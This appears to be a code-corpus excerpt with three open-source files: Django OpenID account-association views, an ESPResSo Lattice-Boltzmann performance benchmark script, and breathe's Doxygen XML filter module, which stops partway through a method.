if form1.is_valid():
redirect_url = "%s%s?%s" % (
get_url_host(request),
reverse('user_complete_signin'),
urllib.urlencode({ redirect_field_name: redirect_to })
)
return ask_openid(request,
form1.cleaned_data['openid_url'],
redirect_url,
on_failure=on_failure)
else:
# perform normal django authentification
form2 = auth_form(data=request.POST)
if form2.is_valid():
login(request, form2.get_user())
if request.session.test_cookie_worked():
request.session.delete_test_cookie()
return HttpResponseRedirect(redirect_to)
return render_to_response(template_name, {
'form1': form1,
'form2': form2,
redirect_field_name: redirect_to,
'msg': request.GET.get('msg','')
}, context_instance=_build_context(request, extra_context=extra_context))
@csrf_exempt
@login_required
def dissociate(request, template_name="authopenid/dissociate.html",
dissociate_form=OpenidDissociateForm,
redirect_field_name=REDIRECT_FIELD_NAME,
default_redirect=settings.LOGIN_REDIRECT_URL, extra_context=None):
""" view used to dissociate an openid from an account """
nb_associated_openids, associated_openids = get_associate_openid(request.user)
if nb_associated_openids == 1 and not request.user.has_usable_password() and request.method != 'GET':
msg = ["You can't remove this openid, you should set a password first."]
return render_to_response("authopenid/associate.html",{
'associated_openids' : associated_openids ,
'nb_associated_openids':nb_associated_openids,
'msg': msg},
context_instance = RequestContext(request)
)
if request.POST:
if request.POST.get('bdissociate_cancel','') == 'Cancel':
msg = ['Operation Cancel.']
return redirect_to(request,'/accounts/openid/associate/')
openid_urls = request.POST.getlist('a_openids_remove')
if len(openid_urls) >= 1:
for openid_url in openid_urls:
UserAssociation.objects.get(openid_url__exact=openid_url).delete()
if openid_url == request.session.get('openid_url'):
del request.session['openid_url']
msg = "Openid removed."
request.user.message_set.create(message = msg)
return redirect_to(request,'/accounts/openid/associate')
else:
return redirect_to(request, '/accounts/openid/associate')
@login_required
def associate(request, template_name='authopenid/associate.html',
openid_form=AssociateOpenID, redirect_field_name='/',
on_failure=associate_failure, extra_context=None):
nb_associated_openids, associated_openids = get_associate_openid(request.user)
redirect_to = request.REQUEST.get(redirect_field_name, '')
if request.POST:
if 'a_openids' in request.POST.keys():
a_openids = []
if request.POST.get('a_openids','') is not '':
a_openids = request.POST.getlist('a_openids')
if len(a_openids) == nb_associated_openids and not request.user.has_usable_password():
if len(a_openids) > 1:
msg = ["You can't remove these openids, You should set a password first."]
else:
msg = ["You can't remove this openid, You should set a password first."]
return render_to_response('authopenid/associate.html', {
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
return render_to_response("authopenid/dissociate.html",{
'a_openids' : a_openids },
context_instance = RequestContext(request)
)
else:
form = openid_form(request.user, data=request.POST)
if form.is_valid():
if ' ' in form.cleaned_data['openid_url'] or form.cleaned_data['openid_url'] in OPENID_PROVIDER:
msg = ['You must enter a valid OpenID url']
return render_to_response('authopenid/associate.html', {
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
if not redirect_to or '://' in redirect_to or ' ' in redirect_to:
redirect_to = settings.LOGIN_REDIRECT_URL
redirect_url = "%s%s?%s" % (
get_url_host(request),
reverse('user_complete_myassociate'),
urllib.urlencode({ redirect_field_name: redirect_to })
)
return ask_openid(request,
form.cleaned_data['openid_url'],
redirect_url,
on_failure=on_failure)
else:
msg = ['You must enter a valid OpenID url']
return render_to_response('authopenid/associate.html', {
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
else:
form = openid_form(request.user)
msg = messages.get_messages(request)
return render_to_response('authopenid/associate.html', {
'form': form,
redirect_field_name: redirect_to,
'associated_openids' : associated_openids,
'nb_associated_openids' : nb_associated_openids,
'msg':msg,
}, context_instance=_build_context(request, extra_context=extra_context))
@login_required
def associate_success(request, identity_url, openid_response,
redirect_field_name=REDIRECT_FIELD_NAME, send_email=True, **kwargs):
openid_ = from_openid_response(openid_response)
openids = request.session.get('openids', [])
openids.append(openid_)
request.session['openids'] = openids
uassoc = UserAssociation(
openid_url=str(openid_),
user_id=request.user.id
)
uassoc.save(send_email=send_email)
redirect_to = '/accounts/openid/associate'
nb_associated_openids, associated_openids = get_associate_openid(request.user)
msg = ["Your Openid has been added"]
return render_to_response("authopenid/associate.html",{
'associated_openids' : associated_openids ,
'nb_associated_openids':nb_associated_openids,
'msg': msg},
context_instance = RequestContext(request)
)
@csrf_exempt
@login_required
def complete_associate(request, redirect_field_name=REDIRECT_FIELD_NAME,
template_failure='authopenid/associate.html',
openid_form=AssociateOpenID, redirect_name=None,
on_success=associate_success, on_failure=associate_failure,
send_email=True, extra_context=None):
if request.method == 'GET':
return mycomplete(request, on_success, on_failure,
get_url_host(request) + reverse('user_complete_myassociate'),
redirect_field_name=redirect_field_name, openid_form=openid_form,
template_failure=template_failure, redirect_name=redirect_name,
send_email=send_email, extra_context=extra_context)
else:
return associate(request, template_name='authopenid/associate.html',
openid_form=AssociateOpenID, redirect_field_name='/',
on_failure=associate_failure, extra_context=None)
def get_associate_openid(user):
""" get list of associated openids """
rels = UserAssociation.objects.filter(user=user)
associated_openids = [rel.openid_url for rel in rels]
nb_associated_openids = len(associated_openids)
return nb_associated_openids, associated_openids
def openid_profile(request, next, template_name='auth/openid_profile.html'):
nb, associated_openids = get_associate_openid(request.user)
return render_to_string(template_name,
{ 'idp_openid': getattr(settings, 'IDP_OPENID', False),
'associated_openids': associated_openids},
RequestContext(request))
| agpl-3.0 | -8,868,549,658,912,582,000 | 45.25 | 112 | 0.626271 | false |
espressomd/espresso | maintainer/benchmarks/lb.py | 1 | 6553 | #
# Copyright (C) 2013-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Benchmark Lattice-Boltzmann fluid + Lennard-Jones particles
"""
import os
import sys
import numpy as np
from time import time
import argparse
parser = argparse.ArgumentParser(description="Benchmark LB simulations. "
"Save the results to a CSV file.")
parser.add_argument("--particles_per_core", metavar="N", action="store",
type=int, default=125, required=False,
help="Number of particles in the simulation box")
parser.add_argument("--lb_sites_per_particle", metavar="N_LB", action="store",
type=float, default=28, required=False,
help="Number of particles in the simulation box")
parser.add_argument("--volume_fraction", metavar="FRAC", action="store",
type=float, default=0.03, required=False,
help="Fraction of the simulation box volume occupied by "
"particles (range: [0.01-0.74], default: 0.50)")
group = parser.add_mutually_exclusive_group()
group.add_argument("--output", metavar="FILEPATH", action="store",
type=str, required=False, default="benchmarks.csv",
help="Output file (default: benchmarks.csv)")
args = parser.parse_args()
# process and check arguments
n_iterations = 30
assert args.volume_fraction > 0, "volume_fraction must be a positive number"
assert args.volume_fraction < np.pi / (3 * np.sqrt(2)), \
"volume_fraction exceeds the physical limit of sphere packing (~0.74)"
import espressomd
required_features = ["LENNARD_JONES"]
espressomd.assert_features(required_features)
# System
#############################################################
system = espressomd.System(box_l=[1, 1, 1])
# Interaction parameters (Lennard-Jones)
#############################################################
lj_eps = 1.0 # LJ epsilon
lj_sig = 1.0 # particle diameter
lj_cut = lj_sig * 2**(1. / 6.) # cutoff distance
# System parameters
#############################################################
n_proc = system.cell_system.get_state()['n_nodes']
n_part = n_proc * args.particles_per_core
# volume of N spheres with radius r: N * (4/3*pi*r^3)
box_l = (n_part * 4. / 3. * np.pi * (lj_sig / 2.)**3
/ args.volume_fraction)**(1. / 3.)
lb_grid = int((round(n_part * args.lb_sites_per_particle)**(1. / 3)))
agrid = box_l / lb_grid
measurement_steps = int(max(120**3 / lb_grid**3, 50))
# System
#############################################################
system.box_l = 3 * (box_l,)
# PRNG seeds
#############################################################
# np.random.seed(1)
# Integration parameters
#############################################################
system.time_step = 0.01
system.cell_system.skin = 0.5
system.thermostat.turn_off()
#############################################################
# Setup System #
#############################################################
# Interaction setup
#############################################################
system.non_bonded_inter[0, 0].lennard_jones.set_params(
epsilon=lj_eps, sigma=lj_sig, cutoff=lj_cut, shift="auto")
# Particle setup
#############################################################
# Warmup Integration #
#############################################################
system.integrator.set_steepest_descent(
f_max=0,
gamma=0.001,
max_displacement=0.01)
# warmup
while system.analysis.energy()["total"] > 0.1 * n_part:
print("minimization: {:.1f}".format(system.analysis.energy()["total"]))
system.integrator.run(20)
print("minimization: {:.1f}".format(system.analysis.energy()["total"]))
print()
system.integrator.set_vv()
system.thermostat.set_langevin(kT=1.0, gamma=1.0, seed=42)
# tuning and equilibration
print("Tune skin: {}".format(system.cell_system.tune_skin(
min_skin=0.2, max_skin=1, tol=0.05, int_steps=100)))
system.integrator.run(500)
print("Tune skin: {}".format(system.cell_system.tune_skin(
min_skin=0.2, max_skin=1, tol=0.05, int_steps=100)))
system.integrator.run(500)
system.thermostat.turn_off()
print("lb sites", lb_grid, "agrid", agrid)
if "LBFluid" in dir(espressomd.lb):
LBClass = espressomd.lb.LBFluid
elif "LBFluidWalberla" in dir(espressomd.lb):
LBClass = espressomd.lb.LBFluidWalberla
else:
raise Exception("LB not built in")
lbf = LBClass(agrid=agrid, dens=1, visc=1, tau=system.time_step, kT=1, seed=1)
system.actors.add(lbf)
print("lb shape", lbf.shape)
system.thermostat.set_lb(gamma=10, LB_fluid=lbf, seed=2)
# time integration loop
print("Timing every {} steps".format(measurement_steps))
main_tick = time()
all_t = []
for i in range(n_iterations):
tick = time()
system.integrator.run(measurement_steps)
tock = time()
t = (tock - tick) / measurement_steps
print("step {}, time = {:.2e}, verlet: {:.2f}, energy: {:.2e}"
.format(i, t, system.cell_system.get_state()["verlet_reuse"],
system.analysis.energy()["total"]))
all_t.append(t)
main_tock = time()
# average time
all_t = np.array(all_t)
avg = np.average(all_t)
ci = 1.96 * np.std(all_t) / np.sqrt(len(all_t) - 1)
print("average: {:.3e} +/- {:.3e} (95% C.I.)".format(avg, ci))
cmd = " ".join(x for x in sys.argv[1:] if not x.startswith("--output"))
report = ('"{script}","{arguments}",{cores},{mean:.3e},'
'{ci:.3e},{n},{dur:.1f}\n'.format(
script=os.path.basename(sys.argv[0]), arguments=cmd,
cores=n_proc, dur=main_tock - main_tick, n=measurement_steps,
mean=avg, ci=ci))
if not os.path.isfile(args.output):
report = ('"script","arguments","cores","mean","ci",'
'"nsteps","duration"\n' + report)
with open(args.output, "a") as f:
f.write(report)
| gpl-3.0 | -8,576,075,647,164,855,000 | 34.808743 | 78 | 0.581566 | false |
frontg8/frontg8lib | doc/ext/breathe/breathe/renderer/filter.py | 1 | 37770 | """
Filters
-------
Filters are an interesting and somewhat challenging part of the code base. They are used for
two different purposes:
- To figure out which nodes in the xml hierarchy to start rendering from. These are called
'finder filters' or 'content filters'. This is done before rendering starts.
- To figure out which nodes under a selected nodes in the xml hierarchy should be rendered. These
are called 'render filters'. This is done during the render process with a test in the
DoxygenToRstRendererFactory.
General Implementation
~~~~~~~~~~~~~~~~~~~~~~
Filters are essential just tests to see if a node matches certain parameters that are needed to
decide whether or not to include it in some output.
As these filters are declared once and then used on multiple nodes, we model them as object
hierarchies that encapsulate the required test and take a node (with its context) and return True or
False.
If you wanted a test which figures out if a node has the node_type 'memberdef' you might create the
following object hierarchy:
node_is_memberdef = InFilter(AttributeAccessor(Node(), 'node_type'), ['memberdef'])
This reads from the inside out, as get the node, then get the node_type attribute from it, and see
if the value of the attribute is in the list ['memberdef'].
The Node() is called a 'Selector'. Parent() is also a selector. It means given the current context,
work with the parent of the current node rather than the node itself. This allows you to frame tests
in terms of a node's parent as well as the node which helps when we want nodes with particular
parents and not others.
The AttributeAccessor() is called an 'Accessor'. It wraps up an attempt to access a particular
attribute on the selected node. There are quite a few different specific accessors but they can
mostly be generalised with the AttributeAccessor. This code has evolved over time and initially the
implementation involved specific accessor classes (which are still used in large parts of it.)
The InFilter() is unsurprisingly called a 'Filter'. There are lots of different filters. Filters
either act on the results of Accessors or on the results of other Filters and they always return
True or False. The AndFilter and the OrFilter can be used to combine the outputs of other Filters
with logical 'and' and 'or' operations.
You can build up some pretty complex expressions with this level of freedom as you
might imagine. The complexity is unfortunate but necessary as the nature of filtering the xml is
quite complex.
Finder Filters
~~~~~~~~~~~~~~
The implementation of the filters can change a little depending on how they are called. Finder
filters are called from the breathe.finder.doxygen.index and breathe.finder.doxygen.compound files.
They are called like this:
# Descend down the hierarchy
# ...
if filter_.allow(node_stack):
matches.append(self.data_object)
# Keep on descending
# ...
This means that the result of the filter does not stop us descending down the hierarchy and testing
more nodes. This simplifies the filters as they only have to return true for the exact nodes they
are interested in and they don't have to worry about allowing the iteration down the hierarchy to
continue for nodes which don't match.
An example of a finder filter is:
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
InFilter(NameAccessor(Node()), ["mygroup"])
)
This says, return True for all the nodes of node_type 'compound' with 'kind' set to 'group' which
have the name 'mygroup'. It returns false for everything else, but when a node matching this is
found then it is added to the matches list by the code above.
It is therefore relatively easy to write finder filters. If you have two separate node filters like
the one above and you want to match on both of them then you can do:
OrFilter(
node_filter_1,
node_filter_2
)
To combine them.
Content Filters
~~~~~~~~~~~~~~~
Content filters are harder than the finder filters as they are responsible for halting the iteration
down the hierarchy if they return false. This means that if you're interested in memberdef nodes
with a particular attribute then you have to check for that but also include a clause which allows
all other non-memberdef nodes to pass through as you don't want to interrupt them.
This means you end up with filters like this:
OrFilter(
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
InFilter(NameAccessor(Node()), ["mygroup"])
),
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
)
)
)
Which is to say that we want to let through a compound, with kind group, with name 'mygroup' but
we're also happy if the node is **not** a compund with kind group. Really we just don't want to let
through any compounds with kind group with name other than 'mygroup'. As such, we can rephrase this
as:
NotFilter(
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"]),
InFilter(KindAccessor(Node()), ["group"]),
NotFilter(InFilter(NameAccessor(Node()), ["mygroup"]))
)
)
Using logical manipulation we can rewrite this as:
OrFilter(
NotFilter(InFilter(NodeTypeAccessor(Node()), ["compound"])),
NotFilter(InFilter(KindAccessor(Node()), ["group"])),
InFilter(NameAccessor(Node()), ["mygroup"])
)
We reads: allow if it isn't a compound, or if it is a compound but doesn't have a 'kind' of 'group',
but if it is a compound and has a 'kind' of 'group then only allow it if it is named 'mygroup'.
Helper Syntax
~~~~~~~~~~~~~
Some of these filter declarations get a little awkward to read and write. They are not laid out in
manner which reads smoothly. Additional helper methods and operator overloads have been introduced
to help with this.
AttributeAccessor objects are created in property methods on the Selector classes so:
node.kind
Where node has been declared as a Node() instance. Results in:
AttributeAccessor(Node(), 'kind')
The '==' and '!=' operators on the Accessors have been overloaded to return the appropriate filters
so that:
node.kind == 'group'
Results in:
InFilter(AttributeAccessor(Node(), 'kind'), ['kind'])
We also override the binary 'and' (&), 'or' (|) and 'not' (~) operators in Python to apply
AndFilters, OrFilters and NotFilters respectively. We have to override the binary operators as they
actual 'and', 'or' and 'not' operators cannot be overridden. So:
(node.node_type == 'compound') & (node.name == 'mygroup')
Translates to:
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compound"])),
InFilter(NameAccessor(Node()), ["mygroup"])
)
Where the former is hopefully more readable without sacrificing too much to the abstract magic of
operator overloads.
Operator Precedences & Extra Parenthesis
''''''''''''''''''''''''''''''''''''''''
As the binary operators have a lower operator precedence than '==' and '!=' and some other operators
we have to include additional parenthesis in the expressions to group them as we want. So instead of
writing:
node.node_type == 'compound' & node.name == 'mygroup'
We have to write:
(node.node_type == 'compound') & (node.name == 'mygroup')
"""
import six
class UnrecognisedKindError(Exception):
pass
class Selector(object):
@property
def node_type(self):
return NodeTypeAccessor(self)
@property
def kind(self):
return AttributeAccessor(self, 'kind')
@property
def node_name(self):
return AttributeAccessor(self, 'node_name')
@property
def name(self):
return AttributeAccessor(self, 'name')
@property
def briefdescription(self):
return AttributeAccessor(self, 'briefdescription')
@property
def detaileddescription(self):
return AttributeAccessor(self, 'detaileddescription')
@property
def prot(self):
return AttributeAccessor(self, 'prot')
@property
def valueOf(self):
return AttributeAccessor(self, 'valueOf_')
@property
def id(self):
return AttributeAccessor(self, 'id')
class Ancestor(Selector):
def __init__(self, generations):
self.generations = generations
def __call__(self, node_stack):
return node_stack[self.generations]
class Parent(Selector):
def __call__(self, node_stack):
return node_stack[1]
class Node(Selector):
def __call__(self, node_stack):
return node_stack[0]
class Accessor(object):
def __init__(self, selector):
self.selector = selector
def __eq__(self, value):
return InFilter(self, [value])
def __ne__(self, value):
return NotFilter(InFilter(self, [value]))
def is_one_of(self, collection):
return InFilter(self, collection)
def has_content(self):
return HasContentFilter(self)
def endswith(self, options):
return EndsWithFilter(self, options)
class NameAccessor(Accessor):
def __call__(self, node_stack):
return self.selector(node_stack).name
class NodeNameAccessor(Accessor):
"""Check the .node_name member which is declared on refTypeSub nodes
It distinguishes between innerclass, innernamespace, etc.
"""
def __call__(self, node_stack):
return self.selector(node_stack).node_name
class NodeTypeAccessor(Accessor):
def __call__(self, node_stack):
data_object = self.selector(node_stack)
try:
return data_object.node_type
except AttributeError as e:
# Horrible hack to silence errors on filtering unicode objects
# until we fix the parsing
if type(data_object) == six.text_type:
return "unicode"
else:
raise e
class KindAccessor(Accessor):
def __call__(self, node_stack):
return self.selector(node_stack).kind
class AttributeAccessor(Accessor):
"""Returns the value of a particular attribute on the selected node.
AttributeAccessor(Node(), 'name') returns the value of ``node.name``.
"""
def __init__(self, selector, attribute_name):
Accessor.__init__(self, selector)
self.attribute_name = attribute_name
def __call__(self, node_stack):
return getattr(self.selector(node_stack), self.attribute_name)
class LambdaAccessor(Accessor):
def __init__(self, selector, func):
Accessor.__init__(self, selector)
self.func = func
def __call__(self, node_stack):
return self.func(self.selector(node_stack))
class NamespaceAccessor(Accessor):
def __call__(self, node_stack):
return self.selector(node_stack).namespaces
class Filter(object):
def __and__(self, other):
return AndFilter(self, other)
def __or__(self, other):
return OrFilter(self, other)
def __invert__(self):
return NotFilter(self)
class HasAncestorFilter(Filter):
def __init__(self, generations):
self.generations = generations
def allow(self, node_stack):
return len(node_stack) > self.generations
class HasContentFilter(Filter):
def __init__(self, accessor):
self.accessor = accessor
def allow(self, node_stack):
"""Detects if the node in questions has an empty .content_ property.
"""
return bool(self.accessor(node_stack).content_)
class EndsWithFilter(Filter):
"""Detects if the string result of the accessor ends with any of the strings in the ``options``
iterable parameter.
"""
def __init__(self, accessor, options):
self.accessor = accessor
self.options = options
def allow(self, node_stack):
string = self.accessor(node_stack)
for entry in self.options:
if string.endswith(entry):
return True
return False
class InFilter(Filter):
"""Checks if what is returned from the accessor is 'in' in the members"""
def __init__(self, accessor, members):
self.accessor = accessor
self.members = members
def allow(self, node_stack):
name = self.accessor(node_stack)
return name in self.members
class GlobFilter(Filter):
def __init__(self, accessor, glob):
self.accessor = accessor
self.glob = glob
def allow(self, node_stack):
text = self.accessor(node_stack)
return self.glob.match(text)
class FilePathFilter(Filter):
def __init__(self, accessor, target_file, path_handler):
self.accessor = accessor
self.target_file = target_file
self.path_handler = path_handler
def allow(self, node_stack):
location = self.accessor(node_stack).file
if self.path_handler.includes_directory(self.target_file):
# If the target_file contains directory separators then
# match against the same length at the end of the location
#
location_match = location[-len(self.target_file):]
return location_match == self.target_file
else:
# If there are no separators, match against the whole filename
# at the end of the location
#
# This is to prevent "Util.cpp" matching "PathUtil.cpp"
#
location_basename = self.path_handler.basename(location)
return location_basename == self.target_file
class NamespaceFilter(Filter):
def __init__(self, namespace_accessor, name_accessor):
self.namespace_accessor = namespace_accessor
self.name_accessor = name_accessor
def allow(self, node_stack):
namespaces = self.namespace_accessor(node_stack)
name = self.name_accessor(node_stack)
try:
namespace, name = name.rsplit("::", 1)
except ValueError:
namespace, name = "", name
return namespace in namespaces
class OpenFilter(Filter):
def allow(self, node_stack):
return True
class ClosedFilter(Filter):
def allow(self, node_stack):
return False
class NotFilter(Filter):
def __init__(self, child_filter):
self.child_filter = child_filter
def allow(self, node_stack):
return not self.child_filter.allow(node_stack)
class AndFilter(Filter):
def __init__(self, *filters):
self.filters = filters
def allow(self, node_stack):
# If any filter returns False then return False
for filter_ in self.filters:
if not filter_.allow(node_stack):
return False
return True
class OrFilter(Filter):
"""Provides a short-cutted 'or' operation between two filters"""
def __init__(self, *filters):
self.filters = filters
def allow(self, node_stack):
# If any filter returns True then return True
for filter_ in self.filters:
if filter_.allow(node_stack):
return True
return False
class IfFilter(Filter):
def __init__(self, condition, if_true, if_false):
self.condition = condition
self.if_true = if_true
self.if_false = if_false
def allow(self, node_stack):
if self.condition.allow(node_stack):
return self.if_true.allow(node_stack)
else:
return self.if_false.allow(node_stack)
class Glob(object):
def __init__(self, method, pattern):
self.method = method
self.pattern = pattern
def match(self, name):
return self.method(name, self.pattern)
class Gather(object):
def __init__(self, accessor, names):
self.accessor = accessor
self.names = names
def allow(self, node_stack):
self.names.extend(self.accessor(node_stack))
return False
class FilterFactory(object):
# C++ style public entries
public_kinds = set([
"public-type",
"public-func",
"public-attrib",
"public-slot",
"public-static-func",
"public-static-attrib",
])
def __init__(self, path_handler):
self.path_handler = path_handler
self.default_members = ()
self.implementation_filename_extensions = ()
def create_render_filter(self, kind, options):
"""Render filter for group & namespace blocks"""
if kind not in ['group', 'namespace']:
raise UnrecognisedKindError(kind)
# Generate new dictionary from defaults
filter_options = dict((entry, u'') for entry in self.default_members)
# Update from the actual options
filter_options.update(options)
# Convert the doxygengroup members flag (which just stores None as the value) to an empty
# string to allow the create_class_member_filter to process it properly
if 'members' in filter_options:
filter_options['members'] = u''
node = Node()
grandparent = Ancestor(2)
has_grandparent = HasAncestorFilter(2)
non_class_memberdef = \
has_grandparent \
& (grandparent.node_type == 'compounddef') \
& (grandparent.kind != 'class') \
& (grandparent.kind != 'struct') \
& (node.node_type == 'memberdef')
return (self.create_class_member_filter(filter_options) | non_class_memberdef) \
& self.create_innerclass_filter(filter_options) \
& self.create_outline_filter(filter_options)
def create_class_filter(self, target, options):
"""Content filter for classes based on various directive options"""
# Generate new dictionary from defaults
filter_options = dict((entry, u'') for entry in self.default_members)
# Update from the actual options
filter_options.update(options)
return AndFilter(
self.create_class_member_filter(filter_options),
self.create_innerclass_filter(filter_options, outerclass=target),
self.create_outline_filter(filter_options),
self.create_show_filter(filter_options),
)
def create_innerclass_filter(self, options, outerclass=''):
"""
:param outerclass: Should be the class/struct being target by the directive calling this
code. If it is a group or namespace directive then it should be left
blank. It is used when looking for names listed in the :members: option.
The name should include any additional namespaces that the target class
is in.
"""
node = Node()
node_is_innerclass = (node.node_type == "ref") & (node.node_name == "innerclass")
parent = Parent()
parent_is_compounddef = parent.node_type == 'compounddef'
parent_is_class = parent.kind.is_one_of(['class', 'struct'])
allowed = set()
all_options = {
'protected-members': 'protected',
'private-members': 'private',
}
for option, scope in all_options.iteritems():
if option in options:
allowed.add(scope)
node_is_innerclass_in_class = parent_is_compounddef & parent_is_class & node_is_innerclass
public_innerclass_filter = ClosedFilter()
if 'members' in options:
if options['members'].strip():
text = options["members"]
prefix = ('%s::' % outerclass) if outerclass else ''
# Matches sphinx-autodoc behaviour of comma separated values
members = set(['%s%s' % (prefix, x.strip()) for x in text.split(",")])
node_valueOf_is_in_members = node.valueOf.is_one_of(members)
# Accept any nodes which don't have a "sectiondef" as a parent or, if they do, only
# accept them if their names are in the members list
public_innerclass_filter = ~node_is_innerclass_in_class | node_valueOf_is_in_members
else:
allowed.add('public')
node_is_in_allowed_scope = node.prot.is_one_of(allowed)
innerclass = ~ node_is_innerclass_in_class | node_is_in_allowed_scope
description = self._create_description_filter(True, 'compounddef', options)
# Put parent check last as we only want to check parents of innerclass's otherwise we have
# to check the parent's type as well
return innerclass | public_innerclass_filter | description
def create_show_filter(self, options):
"""Currently only handles the header-file entry"""
try:
text = options["show"]
except KeyError:
# Allow through everything except the header-file includes nodes
return OrFilter(
NotFilter(InFilter(NodeTypeAccessor(Parent()), ["compounddef"])),
NotFilter(InFilter(NodeTypeAccessor(Node()), ["inc"]))
)
if text == "header-file":
# Allow through everything, including header-file includes
return OpenFilter()
# Allow through everything except the header-file includes nodes
return OrFilter(
NotFilter(InFilter(NodeTypeAccessor(Parent()), ["compounddef"])),
NotFilter(InFilter(NodeTypeAccessor(Node()), ["inc"]))
)
def _create_description_filter(self, allow, level, options):
"""Whether or not we allow descriptions is determined by the calling function and we just do
whatever the 'allow' function parameter tells us.
"""
node = Node()
node_is_description = node.node_type == 'description'
parent = Parent()
parent_is_level = parent.node_type == level
# Nothing with a parent that's a sectiondef
description_filter = ~ parent_is_level
# Let through any description children of sectiondefs if we output any kind members
if allow:
description_filter = \
(parent_is_level & node_is_description) | ~ parent_is_level
return description_filter
def _create_public_members_filter(self, options):
node = Node()
node_is_memberdef = node.node_type == "memberdef"
node_is_public = node.prot == "public"
parent = Parent()
parent_is_sectiondef = parent.node_type == "sectiondef"
# Nothing with a parent that's a sectiondef
is_memberdef = parent_is_sectiondef & node_is_memberdef
public_members_filter = ~ is_memberdef
# If the user has specified the 'members' option with arguments then we only pay attention
# to that and not to any other member settings
if "members" in options:
if options['members'].strip():
text = options["members"]
# Matches sphinx-autodoc behaviour of comma separated values
members = set([x.strip() for x in text.split(",")])
node_name_is_in_members = node.name.is_one_of(members)
# Accept any nodes which don't have a "sectiondef" as a parent or, if they do, only
# accept them if their names are in the members list
public_members_filter = \
(parent_is_sectiondef & node_name_is_in_members) | ~ parent_is_sectiondef
else:
# Select anything that doesn't have a parent which is a sectiondef, or, if it does,
# only select the public ones
public_members_filter = \
(is_memberdef & node_is_public) | ~ is_memberdef
return public_members_filter
def _create_non_public_members_filter(self, prot, option_name, options):
"""'prot' is the doxygen xml term for 'public', 'protected' and 'private' categories."""
node = Node()
node_is_memberdef = node.node_type == "memberdef"
node_is_public = node.prot == prot
parent = Parent()
parent_is_sectiondef = parent.node_type == "sectiondef"
# Nothing with a parent that's a sectiondef
is_memberdef = parent_is_sectiondef & node_is_memberdef
filter_ = ~ is_memberdef
if option_name in options:
# Allow anything that isn't a memberdef, or if it is only allow the public ones
filter_ = ~ is_memberdef | node_is_public
return filter_
def _create_undoc_members_filter(self, options):
node = Node()
node_is_memberdef = node.node_type == 'memberdef'
node_has_description = node.briefdescription.has_content() \
| node.detaileddescription.has_content()
# Allow anything that isn't a memberdef, or if it is only allow the ones with a description
undoc_members_filter = ~ node_is_memberdef | node_has_description
if 'undoc-members' in options:
undoc_members_filter = OpenFilter()
return undoc_members_filter
def create_class_member_filter(self, options):
"""Content filter based on :members: and :private-members: classes"""
# I can't fully explain the filtering of descriptions here. More testing needed to figure
# out when it is needed. This approach reflects the old code that was here but it wasn't
# commented (my fault.) I wonder if maybe the public and private declarations themselves can
# be documented and we need to let them through. Not sure.
allow = 'members' in options \
or 'protected-members' in options \
or 'private-members' in options
description = self._create_description_filter(allow, 'sectiondef', options)
# Create all necessary filters and combine them
public_members = self._create_public_members_filter(options)
protected_members = self._create_non_public_members_filter(
'protected',
'protected-members',
options
)
private_members = self._create_non_public_members_filter(
'private',
'private-members',
options
)
undoc_members = self._create_undoc_members_filter(options)
# Allow any public/private members which also fit the undoc filter and all the descriptions
allowed_members = (public_members | protected_members | private_members) & undoc_members
return allowed_members | description
def create_outline_filter(self, options):
if 'outline' in options:
node = Node()
return ~ node.node_type.is_one_of(["description", "inc"])
else:
return OpenFilter()
def create_file_filter(self, filename, options):
valid_names = []
filter_ = AndFilter(
NotFilter(
# Gather the "namespaces" attribute from the
# compounddef for the file we're rendering and
# store the information in the "valid_names" list
#
# Gather always returns false, so, combined with
# the NotFilter this chunk always returns true and
# so does not affect the result of the filtering
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["compounddef"]),
InFilter(KindAccessor(Node()), ["file"]),
FilePathFilter(
LambdaAccessor(Node(), lambda x: x.location),
filename, self.path_handler
),
Gather(LambdaAccessor(Node(), lambda x: x.namespaces), valid_names)
)
),
NotFilter(
# Take the valid_names and everytime we handle an
# innerclass or innernamespace, check that its name
# was one of those initial valid names so that we
# never end up rendering a namespace or class that
# wasn't in the initial file. Notably this is
# required as the location attribute for the
# namespace in the xml is unreliable.
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(NodeTypeAccessor(Node()), ["ref"]),
InFilter(NodeNameAccessor(Node()), ["innerclass", "innernamespace"]),
NotFilter(
InFilter(
LambdaAccessor(Node(), lambda x: x.content_[0].getValue()),
valid_names
)
)
)
),
NotFilter(
# Ignore innerclasses and innernamespaces that are inside a
# namespace that is going to be rendered as they will be
# rendered with that namespace and we don't want them twice
AndFilter(
InFilter(NodeTypeAccessor(Parent()), ["compounddef"]),
InFilter(NodeTypeAccessor(Node()), ["ref"]),
InFilter(NodeNameAccessor(Node()), ["innerclass", "innernamespace"]),
NamespaceFilter(
NamespaceAccessor(Parent()),
LambdaAccessor(Node(), lambda x: x.content_[0].getValue())
)
)
),
NotFilter(
# Ignore memberdefs from files which are different to
# the one we're rendering. This happens when we have to
# cross into a namespace xml file which has entries
# from multiple files in it
AndFilter(
InFilter(NodeTypeAccessor(Node()), ["memberdef"]),
NotFilter(
FilePathFilter(LambdaAccessor(Node(), lambda x: x.location),
filename, self.path_handler)
)
)
),
